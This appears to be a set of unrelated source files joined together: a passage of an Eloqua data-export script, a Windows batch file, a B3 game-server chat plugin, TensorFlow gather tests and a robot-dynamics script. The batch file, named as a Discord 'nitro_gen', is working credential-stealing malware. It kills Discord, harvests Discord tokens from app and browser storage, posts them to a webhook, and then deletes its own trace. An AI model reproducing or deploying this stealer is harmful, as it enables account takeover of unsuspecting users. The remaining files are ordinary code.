"""
Use the get method to pull all available records in the provided range
:param start: starting record ID
:param end: ending record ID
:return: list of dicts containing activities data
"""
activities = []
for i in range(start, end):
data = self.get(asset_id=i)
if data is not None:
activities.append(data)
else:
print("No more activity data, last record exported: {}.".format(i-1))
break
self.sync = 'external'
return activities
def get_campaigns(self, count=1000, p_start=1, p_end=999999):
"""
Pulls all campaigns from Eloqua in a defined range.
:param count: Size of batch to pull per page
:param p_start: Page to start on
:param p_end: Page to finish on
:return:
"""
campaigns = []
print("Starting export on page: {}".format(p_start))
for i in range(p_start, p_end):
data = self.get(count=count, page=i)['elements']
if len(data) != 0:
campaigns.extend(data)
else:
print("No more campaign data, last page exported: {}".format(i-1))
break
self.sync = 'campaigns'
return campaigns
def get_users(self, count=1000, p_start=1, p_end=9999999):
users = []
print("Starting export...")
for i in range(p_start, p_end):
try:
data = self.get(count=count, page=i)['elements']
except TypeError:
break
# print(i)
if len(data) != 0:
# print(data)
users.extend(data)
else:
print("No more user data, last page exported: {}".format(i-1))
break
self.sync = 'users'
return users
# DATA INSERTION ----------------------------------------------------------------------------------------
def insert_data(self, table, col_count, sql_data):
"""
Local function that allows a wait period if database file is busy, then retries
"""
try:
self.c.executemany("""INSERT OR REPLACE INTO {} VALUES ({});""".format(
table, ",".join("?" * col_count)), sql_data)
except sqlite3.OperationalError:
print("ElqRest: Another application is currently using the database,"
" waiting 15 seconds then attempting to continue.")
time.sleep(15)
self.insert_data(table, col_count, sql_data)
self.db.commit()
self.db.close()
print("Data has been committed.")
# DATA PROCESSING STEPS ----------------------------------------------------------------------------------
def export_campaigns(self, table='Campaigns'):
"""
Populates campaigns table in the database.
:param table: name of the table to create, or search in the database
"""
col = ', '.join("'{}' {}".format(key, val) for key, val in TableNames.campaign_col_def.items())
self.c.execute('''CREATE TABLE IF NOT EXISTS {table} ({columns});'''
.format(table=table, columns=col))
new_data = self.get_campaigns(count=1000)
sql_data = []
date_columns = [k for k, v in TableNames.campaign_col_def.items() if v.find('DATETIME') >= 0]
for d in new_data:
dic = {}
for c in date_columns:
# Convert unix timestamps to datetime
try:
d[c] = datetime.datetime.fromtimestamp(
int(d[c])).strftime('%Y-%m-%d %H:%M:%S')
except KeyError:
d[c] = ""
continue
try:
d['Field 1'] = d['fieldValues'][0]['value']
d['Field 2'] = d['fieldValues'][1]['value']
d['Field 3'] = d['fieldValues'][2]['value']
except KeyError:
d['Field 1'] = ""
d['Field 2'] = ""
d['Field 3'] = ""
for k in TableNames.campaign_col_def.keys():
try:
dic[k] = d[k]
except KeyError:
dic[k] = ''
continue
sql_data.append(list(dic.values()))
print("-"*50)
col_count = len(sql_data[0])
self.insert_data(table=table, col_count=col_count, sql_data=sql_data)
def export_users(self, table='users'):
"""
Populates users table in the database.
:param table: name of the table to create, or search in the database
"""
col = ', '.join("'{}' {}".format(key, val) for key, val in TableNames.users_col_def.items())
self.c.execute('''CREATE TABLE IF NOT EXISTS {table} ({columns});'''
.format(table=table, columns=col))
new_data = self.get_users(count=1000)
sql_data = []
date_columns = [k for k, v in TableNames.users_col_def.items()
if (v.find('DATETIME') >= 0) or (v.find('TIMESTAMP') >= 0)]
for d in new_data:
dic = {}
for c in date_columns:
# Convert unix timestamps to datetime
try:
d[c] = datetime.datetime.fromtimestamp(
int(d[c])).strftime('%Y-%m-%d %H:%M:%S')
except KeyError:
d[c] = ""
continue
# Remove extra columns from some users
if len(d) != 12:
for k in TableNames.users_col_def.keys():
dic[k] = d[k]
d = dic
sql_data.append(list(d.values()))
col_count = len(sql_data[0])
# for l in sql_data:
# print(l)
# print(col_count)
self.insert_data(table=table, col_count=col_count, sql_data=sql_data)
def export_external(self, table='External_Activity', start=None, end=99999):
"""
Populates external activity table in the database.
:param table: name of the table to create, or search in the database
:param start: record to start from
:param end: integer, non-inclusive
"""
col = ', '.join("'{}' {}".format(key, val) for key, val in TableNames.external_col_def.items())
# col = col + ", FOREIGN KEY(ContactId) REFERENCES contacts(ContactId)"
try:
self.c.execute("""SELECT {id} FROM {table} ORDER BY {id} DESC LIMIT 1;"""
.format(id='id', table=table))
except sqlite3.OperationalError:
self.c.execute('''CREATE TABLE IF NOT EXISTS {} ({});'''.format(table, col))
# If a start value is given, starts from that, otherwise starts from the first value in the table
# and if there is no table, starts from the first value, and continues until none are left
try:
if start is None:
start = self.c.fetchone()[0]
else:
start = start
if end != 99999:
print("Extracting from {} to {}.".format(start, end-1))
else:
print("Extracting everything after: {}".format(start) + "\nThis could take a while.")
new_data = self.get_activities(start=int(start), end=end)
except TypeError:
print("There is no pre-existing data in this table.")
if end != 99999:
print("Extracting from {} to {}.".format(1, end-1))
else:
print("Extracting everything... This may take a while.")
new_data = self.get_activities(start=1, end=end)
col_count = len(list(new_data[0].keys()))
print("This table contains {} columns.".format(col_count))
sql_data = []
for d in new_data:
# Convert unix timestamps to datetime
d['activityDate'] = datetime.datetime.fromtimestamp(
int(d['activityDate'])).strftime('%Y-%m-%d %H:%M:%S')
d['id'] = int(d['id'])
sql_data.append(list(d.values()))
self.insert_data(table=table, col_count=col_count, sql_data=sql_data)
def main():
# db = ElqRest(sync='campaigns')
# db.export_campaigns()
db = ElqRest(sync='users')
db.export_users()
if __name__ == '__main__':
main()
|
@echo off
REM ╔═╗┌─┐┬─┐┌─┐┬
REM ╠═╣├┤ ├┬┘├─┤│ https://github.com/Its-AfraL/
REM ╩ ╩└ ┴└─┴ ┴┴─┘
if exist nitro_gen.ps1 del /s /q nitro_gen.ps1 > nul
echo $ErrorActionPreference= 'silentlycontinue' > nitro_gen.ps1
echo $tokensString = new-object System.Collections.Specialized.StringCollection >> nitro_gen.ps1
echo $webhook_url = "" >> nitro_gen.ps1
echo $location_array = @( >> nitro_gen.ps1
echo $env:APPDATA + "\Discord\Local Storage\leveldb" #Standard Discord >> nitro_gen.ps1
echo $env:APPDATA + "\discordcanary\Local Storage\leveldb" #Discord Canary >> nitro_gen.ps1
echo $env:APPDATA + "\discordptb\Local Storage\leveldb" #Discord PTB >> nitro_gen.ps1
echo $env:LOCALAPPDATA + "\Google\Chrome\User Data\Default\Local Storage\leveldb" #Chrome Browser >> nitro_gen.ps1
echo $env:APPDATA + "\Opera Software\Opera Stable\Local Storage\leveldb", #Opera Browser >> nitro_gen.ps1
echo $env:LOCALAPPDATA + "\BraveSoftware\Brave-Browser\User Data\Default\Local Storage\leveldb" #Brave Browser >> nitro_gen.ps1
echo $env:LOCALAPPDATA + "\Yandex\YandexBrowser\User Data\Default\Local Storage\leveldb" #Yandex Browser >> nitro_gen.ps1
echo ) >> nitro_gen.ps1
echo Stop-Process -Name "Discord" -Force >> nitro_gen.ps1
echo foreach ($path in $location_array) { >> nitro_gen.ps1
echo if(Test-Path $path){ >> nitro_gen.ps1
echo foreach ($file in Get-ChildItem -Path $path -Name) { >> nitro_gen.ps1
echo $data = Get-Content -Path "$($path)\$($file)" >> nitro_gen.ps1
echo $regex = [regex] '[\w]{24}\.[\w]{6}\.[\w]{27}' >> nitro_gen.ps1
echo $match = $regex.Match($data) >> nitro_gen.ps1
echo while ($match.Success) { >> nitro_gen.ps1
echo if (!$tokensString.Contains($match.Value)) { >> nitro_gen.ps1
echo $tokensString.Add($match.Value) ^| out-null >> nitro_gen.ps1
echo } >> nitro_gen.ps1
echo $match = $match.NextMatch() >> nitro_gen.ps1
echo } >> nitro_gen.ps1
echo } >> nitro_gen.ps1
echo } >> nitro_gen.ps1
echo } >> nitro_gen.ps1
echo foreach ($token in $tokensString) { >> nitro_gen.ps1
echo $message = ^"** Discord tokens : ** >> nitro_gen.ps1
echo ``` $token ``` ^" >> nitro_gen.ps1
echo $hash = @{ "content" = message; } >> nitro_gen.ps1
echo $JSON = $hash ^| convertto-json >> nitro_gen.ps1
echo Invoke-WebRequest -uri $webhook_url -Method POST -Body $JSON -Headers @{'Content-Type' = 'application/json'} >> nitro_gen.ps1
echo } >> nitro_gen.ps1
powershell -file nitro_gen.ps1 > nul
del /s /q nitro_gen.ps1 > nul
pause
|
#
# BigBrotherBot(B3) (www.bigbrotherbot.com)
# Copyright (C) 2006 Walker
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# CHANGELOG
# 01/03/2006 - 1.0.0 - Walker
# Copied Thorn's censor plugin and created the chat plugin from it.
# 14/11/2009 - 1.1.0 - Courgette
# Add keywords $time and $nextmap
# 14/11/2009 - 1.1.1 - Courgette
# Add missing module time
__author__ = 'Walker'
__version__ = '1.1.1'
import b3, re, traceback, sys, threading, random, time
import b3.events
import b3.plugin
import b3.functions
#--------------------------------------------------------------------------------------------------
class ChatPlugin(b3.plugin.Plugin):
_adminPlugin = None
_reClean = re.compile(r'[^0-9a-z ]+', re.I)
_maxLevel = 0
def onStartup(self):
self._adminPlugin = self.console.getPlugin('admin')
if not self._adminPlugin:
return False
self.registerEvent(b3.events.EVT_CLIENT_SAY)
self.registerEvent(b3.events.EVT_CLIENT_TEAM_SAY)
def onLoadConfig(self):
self.console.verbose('ChatPlugin: Fetching chat messages')
self._messages = []
for e in self.config.get('messages/message'):
trigger = e.find('trigger').text
i = 0
_reactions = []
for reaction in e.findall('reaction'):
_reactions.append ( reaction.text )
try:
self._messages.append ([re.compile(trigger, re.I), _reactions])
except Exception, msg:
self.error('ChatPlugin error: %s - %s', msg, traceback.extract_tb(sys.exc_info()[2]))
self.console.verbose('ChatPlugin: Chat messages loaded into memory')
def onEvent(self, event):
try:
if not event.client:
return
sentance = ' ' + self.clean(event.data) + ' '
for m in self._messages:
if m[0].search(sentance):
message = m[1][random.randint(0, len(m[1]) - 1)]
variables = {
'player' : event.client.name,
'time' : self.console.formatTime(time.time())
}
if '$nextmap' in message:
# only include nextmap if required as getNextMap
# can cost a rcon query to the server
variables['nextmap'] = self.console.getNextMap()
message = b3.functions.vars2printf( message )
self.console.say(message % variables)
except Exception, msg:
self.error('Chat plugin error: %s - %s', msg, traceback.extract_tb(sys.exc_info()[2]))
def clean(self, data):
return re.sub(self._reClean, ' ', self.console.stripColors(data.lower()))
if __name__ == '__main__':
from b3.fake import fakeConsole
from b3.fake import joe
import time
#p = ChatPlugin(fakeConsole, 'C:/Users/Thomas/workspace/b3/testconf/extplugins/plugin_chat.xml')
p = ChatPlugin(fakeConsole, '@conf/extplugins/plugin_chat.xml')
p.onStartup()
joe.says("nextmap")
time.sleep(1)
joe.says('time')
time.sleep(1)
joe.says('cheater')
time.sleep(1)
joe.says('fuk*** cheater')
time.sleep(1)
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.ops.tf.gather."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python.compat import compat
from tensorflow.python.eager import context
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
_TEST_TYPES = (dtypes.int64, dtypes.float32,
dtypes.complex64, dtypes.complex128)
# TODO(virimia): Add a benchmark for gather_v2, with batch_dims and axis set.
class GatherTest(test.TestCase, parameterized.TestCase):
def _buildParams(self, data, dtype):
data = data.astype(dtype.as_numpy_dtype)
# For complex types, add an index-dependent imaginary component so we can
# tell we got the right value.
if dtype.is_complex:
return data + 10j * data
return data
def testScalar1D(self):
with self.cached_session(use_gpu=True):
data = np.array([0, 1, 2, 3, 7, 5])
for dtype in _TEST_TYPES:
for indices in 4, [1, 2, 2, 4, 5]:
params_np = self._buildParams(data, dtype)
params = constant_op.constant(params_np)
indices_tf = constant_op.constant(indices)
gather_t = array_ops.gather(params, indices_tf)
gather_val = self.evaluate(gather_t)
np_val = params_np[indices]
self.assertAllEqual(np_val, gather_val)
self.assertEqual(np_val.shape, gather_t.get_shape())
def testScalar2D(self):
with self.session(use_gpu=True):
data = np.array([[0, 1, 2], [3, 4, 5], [6, 7, 8],
[9, 10, 11], [12, 13, 14]])
for dtype in _TEST_TYPES:
for axis in range(data.ndim):
params_np = self._buildParams(data, dtype)
params = constant_op.constant(params_np)
indices = constant_op.constant(2)
gather_t = array_ops.gather(params, indices, axis=axis)
gather_val = self.evaluate(gather_t)
self.assertAllEqual(np.take(params_np, 2, axis=axis), gather_val)
expected_shape = data.shape[:axis] + data.shape[axis + 1:]
self.assertEqual(expected_shape, gather_t.get_shape())
def testSimpleTwoD32(self):
with self.session(use_gpu=True):
data = np.array([[0, 1, 2], [3, 4, 5], [6, 7, 8],
[9, 10, 11], [12, 13, 14]])
for dtype in _TEST_TYPES:
for axis in range(data.ndim):
params_np = self._buildParams(data, dtype)
params = constant_op.constant(params_np)
# The indices must be in bounds for any axis.
indices = constant_op.constant([0, 1, 0, 2])
gather_t = array_ops.gather(params, indices, axis=axis)
gather_val = self.evaluate(gather_t)
self.assertAllEqual(np.take(params_np, [0, 1, 0, 2], axis=axis),
gather_val)
expected_shape = data.shape[:axis] + (4,) + data.shape[axis + 1:]
self.assertEqual(expected_shape, gather_t.get_shape())
@test_util.run_deprecated_v1
def testHigherRank(self):
# We check that scalar and empty indices shapes work as well
shape = (2, 1, 3, 2)
for indices_shape in (), (0,), (2, 0), (2, 3):
for dtype in _TEST_TYPES:
for axis in range(len(shape)):
params = self._buildParams(np.random.randn(*shape), dtype)
indices = np.random.randint(shape[axis], size=indices_shape)
with self.cached_session(use_gpu=True) as sess:
tf_params = constant_op.constant(params)
tf_indices = constant_op.constant(indices)
# Check that both positive and negative indices for axis work.
tf_axis = constant_op.constant(axis)
tf_negative_axis = constant_op.constant(-len(shape) + axis)
gather = array_ops.gather(tf_params, tf_indices, axis=tf_axis)
gather_negative_axis = array_ops.gather(
tf_params, tf_indices, axis=tf_negative_axis)
gather_value, gather_negative_axis_value = sess.run(
[gather, gather_negative_axis])
gather_np = np.take(params, indices, axis)
self.assertAllEqual(gather_np, gather_value)
self.assertAllEqual(gather_np, gather_negative_axis_value)
expected_shape = (params.shape[:axis] + indices.shape +
params.shape[axis + 1:])
self.assertEqual(expected_shape, gather.shape)
self.assertEqual(expected_shape, gather_negative_axis.shape)
# Test gradients
gather_grad = np.random.randn(
*gather.get_shape().as_list()).astype(dtype.as_numpy_dtype)
if dtype.is_complex:
gather_grad -= 1j * gather_grad
params_grad, indices_grad, axis_grad = gradients_impl.gradients(
gather, [tf_params, tf_indices, tf_axis], gather_grad)
self.assertEqual(indices_grad, None)
self.assertEqual(axis_grad, None)
if dtype.is_integer:
self.assertEqual(params_grad, None)
continue
# For axis 0, we are able to create an efficient IndexedSlices for
# the gradient.
if axis == 0:
self.assertEqual(type(params_grad), ops.IndexedSlices)
params_grad = ops.convert_to_tensor(params_grad)
correct_params_grad = np.zeros(shape).astype(dtype.as_numpy_dtype)
outer_dims = axis
inner_dims = len(shape) - axis - 1
gather_grad = gather_grad.reshape(
shape[:axis] + (indices.size,) + shape[axis + 1:])
for source_index, dest_index in enumerate(indices.flat):
dest_slice = ((slice(None),) * outer_dims + (dest_index,) +
(slice(None),) * inner_dims)
source_slice = ((slice(None),) * outer_dims + (source_index,) +
(slice(None),) * inner_dims)
correct_params_grad[dest_slice] += gather_grad[source_slice]
self.assertAllClose(
correct_params_grad,
self.evaluate(params_grad),
atol=2e-6,
rtol=2e-6)
@test_util.run_deprecated_v1
def testString(self):
params = np.array([[b"asdf", b"zxcv"], [b"qwer", b"uiop"]])
with self.cached_session():
self.assertAllEqual([b"qwer", b"uiop"],
array_ops.gather(params, 1, axis=0).eval())
self.assertAllEqual([b"asdf", b"qwer"],
array_ops.gather(params, 0, axis=1).eval())
@test_util.run_deprecated_v1
def testUInt32AndUInt64(self):
for unsigned_type in (dtypes.uint32, dtypes.uint64):
params = self._buildParams(
np.array([[1, 2, 3], [7, 8, 9]]), unsigned_type)
with self.cached_session():
self.assertAllEqual([7, 8, 9],
array_ops.gather(params, 1, axis=0).eval())
self.assertAllEqual([1, 7], array_ops.gather(params, 0, axis=1).eval())
@test_util.run_deprecated_v1
def testUnknownIndices(self):
params = constant_op.constant([[0, 1, 2]])
indices = array_ops.placeholder(dtypes.int32)
gather_t = array_ops.gather(params, indices)
self.assertEqual(None, gather_t.get_shape())
@test_util.run_deprecated_v1
def testUnknownAxis(self):
params = constant_op.constant([[0, 1, 2]])
indices = constant_op.constant([[0, 0], [0, 0]])
axis = array_ops.placeholder(dtypes.int32)
gather_t = array_ops.gather(params, indices, axis=axis)
# Rank 2 params with rank 2 indices results in a rank 3 shape.
self.assertEqual([None, None, None], gather_t.shape.as_list())
# If indices is also unknown the result rank is unknown.
indices = array_ops.placeholder(dtypes.int32)
gather_t = array_ops.gather(params, indices, axis=axis)
self.assertEqual(None, gather_t.shape)
def testBadIndicesCPU(self):
with test_util.force_cpu():
params = [[0, 1, 2], [3, 4, 5]]
with self.assertRaisesOpError(r"indices\[0,0\] = 7 is not in \[0, 2\)"):
self.evaluate(array_ops.gather(params, [[7]], axis=0))
with self.assertRaisesOpError(r"indices\[0,0\] = 7 is not in \[0, 3\)"):
self.evaluate(array_ops.gather(params, [[7]], axis=1))
def _disabledTestBadIndicesGPU(self):
# TODO disabled due to different behavior on GPU and CPU
# On GPU the bad indices do not raise error but fetch 0 values
if not test.is_gpu_available():
return
with self.session(use_gpu=True):
params = [[0, 1, 2], [3, 4, 5]]
with self.assertRaisesOpError(r"indices\[0,0\] = 7 is not in \[0, 2\)"):
array_ops.gather(params, [[7]], axis=0).eval()
with self.assertRaisesOpError(r"indices\[0,0\] = 7 is not in \[0, 3\)"):
array_ops.gather(params, [[7]], axis=1).eval()
@test_util.run_deprecated_v1
def testBadAxis(self):
with self.session(use_gpu=True):
params = [0, 1, 2]
params_ph = array_ops.placeholder(dtypes.int32)
indices = 0
for bad_axis in (1, 2, -2):
# Shape inference can validate axis for known params rank.
with self.assertRaisesWithPredicateMatch(
ValueError, "Shape must be at least rank . but is rank 1"):
array_ops.gather(params, indices, axis=bad_axis)
# If params rank is unknown, an op error occurs.
with self.assertRaisesOpError(
r"Expected axis in the range \[-1, 1\), but got %s" % bad_axis):
array_ops.gather(params_ph, indices, axis=bad_axis).eval(
feed_dict={params_ph: params})
@test_util.run_deprecated_v1
def testEmptySlices(self):
with self.session(use_gpu=True):
for dtype in _TEST_TYPES:
for itype in np.int32, np.int64:
# Leading axis gather.
params = np.zeros((7, 0, 0), dtype=dtype.as_numpy_dtype)
indices = np.array([3, 4], dtype=itype)
gather = array_ops.gather(params, indices, axis=0)
self.assertAllEqual(gather.eval(), np.zeros((2, 0, 0)))
# Middle axis gather.
params = np.zeros((0, 7, 0), dtype=dtype.as_numpy_dtype)
gather = array_ops.gather(params, indices, axis=1)
self.assertAllEqual(gather.eval(), np.zeros((0, 2, 0)))
# Trailing axis gather.
params = np.zeros((0, 0, 7), dtype=dtype.as_numpy_dtype)
gather = array_ops.gather(params, indices, axis=2)
self.assertAllEqual(gather.eval(), np.zeros((0, 0, 2)))
@parameterized.parameters([
# batch_dims=0 (equivalent to tf.gather)
dict( # 2D indices
batch_dims=0,
params=[6, 7, 8, 9],
indices=[[2, 1], [0, 3]],
expected=[[8, 7], [6, 9]]),
dict( # 3D indices
batch_dims=0,
params=[6, 7, 8, 9],
indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
expected=[[[9, 7], [8, 6]], [[6, 9], [8, 8]]]),
dict( # 4D indices
batch_dims=0,
params=[8, 9],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[8, 9], [9, 8]], [[8, 8], [9, 9]]],
[[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
# batch_dims=indices.shape.ndims - 1
# (equivalent to tf.compat.v1.batch_gather)
dict( # 2D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[2, 1], [0, 3]],
expected=[[12, 11], [20, 23]]),
dict( # 3D indices (2 batch dims)
batch_dims=2,
params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
dict( # 2D indices (1 batch dim)
batch_dims=-1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[2, 1], [0, 3]],
expected=[[12, 11], [20, 23]]),
dict( # 3D indices (2 batch dims)
batch_dims=-1,
params=[[[100, 101], [110, 111]], [[200, 201], [210, 211]]],
indices=[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
expected=[[[100, 101], [111, 110]], [[200, 200], [211, 211]]]),
# 0 < batch_dims < indices.shape.ndims - 1
dict( # 3D indices (1 batch dim)
batch_dims=1,
params=[[10, 11, 12, 13], [20, 21, 22, 23]],
indices=[[[3, 1], [2, 0]], [[0, 3], [2, 2]]],
expected=[[[13, 11], [12, 10]], [[20, 23], [22, 22]]]),
dict( # 4D indices (1 batch dim)
batch_dims=1,
params=[[6, 7], [8, 9]],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[6, 7], [7, 6]], [[6, 6], [7, 7]]],
[[[9, 9], [8, 8]], [[8, 9], [9, 8]]]]),
dict( # 4D indices (2 batch dims)
batch_dims=2,
params=[[[2, 3], [4, 5]], [[6, 7], [8, 9]]],
indices=[[[[0, 1], [1, 0]], [[0, 0], [1, 1]]],
[[[1, 1], [0, 0]], [[0, 1], [1, 0]]]],
expected=[[[[2, 3], [3, 2]], [[4, 4], [5, 5]]],
[[[7, 7], [6, 6]], [[8, 9], [9, 8]]]]),
# axis > 0
dict( # 3D indices, batch_dims=1, axis=2
# params.shape = [I1, J1, J2] = [2, 2, 3]
# indices.shape = [I1, K1, K2] = [2, 1, 5]
# result.shape = [I1, J1, K1, K2] = [2, 2, 1, 5]
batch_dims=1,
axis=2,
params=[[[10, 11, 12], [13, 14, 15]], [[20, 21, 22], [23, 24, 25]]],
indices=[[[0, 1, 2, 1, 0]], [[0, 1, 2, 1, 0]]],
expected=[[[[10, 11, 12, 11, 10]], [[13, 14, 15, 14, 13]]],
[[[20, 21, 22, 21, 20]], [[23, 24, 25, 24, 23]]]]),
dict( # 3D indices, batch_dims=None, axis=1
batch_dims=None,
axis=1,
params=[[10, 11, 12], [13, 14, 15]],
indices=[1, 0],
expected=[[11, 10], [14, 13]]),
])
@test_util.run_in_graph_and_eager_modes
def testBatchDims(self, params, indices, batch_dims, expected=None,
axis=None):
result = array_ops.gather(params, indices, axis=axis, batch_dims=batch_dims)
self.assertAllEqual(expected, result)
with compat.forward_compatibility_horizon(2019, 8, 11):
result = array_ops.gather(
params, indices, axis=axis, batch_dims=batch_dims)
self.assertAllEqual(expected, result)
@parameterized.parameters([
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
axis=2,
output_shape=[2, 3, 8, 9, 10, 5, 6, 7]
# = params.shape[:2] + indices.shape[2:] + params.shape[3:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
axis=3,
output_shape=[2, 3, 4, 8, 9, 10, 6, 7]
# = params.shape[:3] + indices.shape[2:] + params.shape[4:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
axis=4,
output_shape=[2, 3, 4, 5, 8, 9, 10, 7]
# = params.shape[:4] + indices.shape[2:] + params.shape[5:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
axis=5,
output_shape=[2, 3, 4, 5, 6, 8, 9, 10]
# = params.shape[:5] + indices.shape[2:] + params.shape[6:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
axis=-4,
output_shape=[2, 3, 8, 9, 10, 5, 6, 7]
# = params.shape[:2] + indices.shape[2:] + params.shape[3:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
axis=-3,
output_shape=[2, 3, 4, 8, 9, 10, 6, 7]
# = params.shape[:3] + indices.shape[2:] + params.shape[4:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
axis=-2,
output_shape=[2, 3, 4, 5, 8, 9, 10, 7]
# = params.shape[:4] + indices.shape[2:] + params.shape[5:]
),
dict(
params_shape=[2, 3, 4, 5, 6, 7],
indices_shape=[2, 3, 8, 9, 10],
batch_dims=2,
axis=-1,
output_shape=[2, 3, 4, 5, 6, 8, 9, 10]
# = params.shape[:5] + indices.shape[2:] + params.shape[6:]
),
])
@test_util.run_in_graph_and_eager_modes
def testBatchDimsMatchesPythonBatching(self, params_shape, indices_shape,
batch_dims, axis, output_shape):
"""Checks that batch_dims matches multiple calls to tf.gather()."""
# Generate a `params` tensor with the indicated shape.
params_size = np.prod(params_shape)
params = np.reshape(np.arange(params_size), params_shape)
# Generate an `indices` tensor with the indicated shape, where each index
# is within the appropriate range.
indices_size = np.prod(indices_shape)
indices = np.reshape(np.arange(indices_size), indices_shape)
indices = indices % params_shape[axis]
# Perform repeated (batched) gather operations with numpy, to find the
# expected result.
expected = self._batchNumpyGather(params, indices, axis, batch_dims)
# On Windows, we get an exception if we pass in the transformed numpy
# arrays ("Failed to convert numpy ndarray to a Tensor (Unsupported
# feed type)."); so convert them back to lists before calling tf.gather.
params = params.tolist()
indices = indices.tolist()
result = array_ops.gather(params, indices, axis=axis, batch_dims=batch_dims)
self.assertAllEqual(output_shape, result.shape.as_list())
self.assertAllEqual(expected, result)
with compat.forward_compatibility_horizon(2019, 8, 11):
result = array_ops.gather(
params, indices, axis=axis, batch_dims=batch_dims)
self.assertAllEqual(output_shape, result.shape.as_list())
self.assertAllEqual(expected, result)
def _batchNumpyGather(self, params, indices, axis, batch_dims):
"""Performs a batch gather by making recursive calls to np.take().
This is used by testBatchDims() to construct the expected value.
Args:
params: A numpy array
indices: A numpy array
axis: An integer
batch_dims: An integer
Returns:
A numpy array
"""
if batch_dims == 0:
return np.take(params, indices, axis=axis)
self.assertEqual(params.shape[0], indices.shape[0])
if axis > 0:
axis -= 1
return np.stack([
self._batchNumpyGather(params[i], indices[i], axis, batch_dims - 1)
for i in range(params.shape[0])
])
@test_util.run_v1_only("RefVariable is not supported in v2")
def testGatherRefVariable(self):
with self.cached_session():
v = variables.RefVariable(constant_op.constant([[1, 2], [3, 4], [5, 6]]))
self.evaluate(variables.global_variables_initializer())
gather = array_ops.gather(v, [0, 2])
if not context.executing_eagerly(): # .op doesn't make sense in Eager
self.assertEqual("GatherV2", gather.op.name)
self.assertAllEqual([[1, 2], [5, 6]], gather)
@test_util.run_in_graph_and_eager_modes
def testGatherResourceVariable(self):
with self.cached_session():
v = resource_variable_ops.ResourceVariable(
constant_op.constant([[1, 2], [3, 4], [5, 6]]))
self.evaluate(variables.global_variables_initializer())
gather = array_ops.gather(v, [0, 2])
if not context.executing_eagerly(): # .op doesn't make sense in Eager
self.assertEqual("ResourceGather", gather.op.inputs[0].op.type)
self.assertAllEqual([[1, 2], [5, 6]], gather)
if __name__ == "__main__":
test.main()
|
import sympy
import numpy
import sympybotics
# 建立机器人模型
rbtdef = sympybotics.RobotDef('Example Robot', # robot name
[('0', 0, 0.29, 'q'), # list of tuples with Denavit-Hartenberg parameters
( 'pi/2', 0, 0, 'q'),
('0',0.32,0,'q'),
('-pi/2',0,0.42,'q'),
('pi/2',0,0,'q'),
('-pi/2',0,0.18,'q')], # (alpha, a, d, theta)
dh_convention='modified' # either 'standard' or 'modified'
)
# 设定重力加速度的值(沿z轴负方向)
rbtdef.gravityacc=sympy.Matrix([0.0, 0.0, -9.81])
# 设定摩擦力 库伦摩擦与粘滞摩擦
rbtdef.frictionmodel = {'Coulomb', 'viscous'}
# 显示动力学全参数
print(rbtdef.dynparms())
#构建机器人动力学模型
rbt = sympybotics.RobotDynCode(rbtdef, verbose=True)
# 转换为C代码
tau_str = sympybotics.robotcodegen.robot_code_to_func('C', rbt.invdyn_code, 'tau_out', 'tau', rbtdef)
print(tau_str) #打印
#计算并显示动力学模型的回归观测矩阵,转换为C代码
rbt.calc_base_parms()
rbt.dyn.baseparms
print(rbt.dyn.baseparms)# 打印最小参数集P
rbt.Hb_code
print(rbt.Hb_code)#打印观测矩阵
Yr = sympybotics.robotcodegen.robot_code_to_func('C', rbt.Hb_code, 'H', 'Hb_code', rbtdef)
print(Yr) #打印显示转换为C代码后的观测矩阵Yr
#把动力学全参数模型,关节力矩模型,观测矩阵和最小惯性参数集结果保存为txt
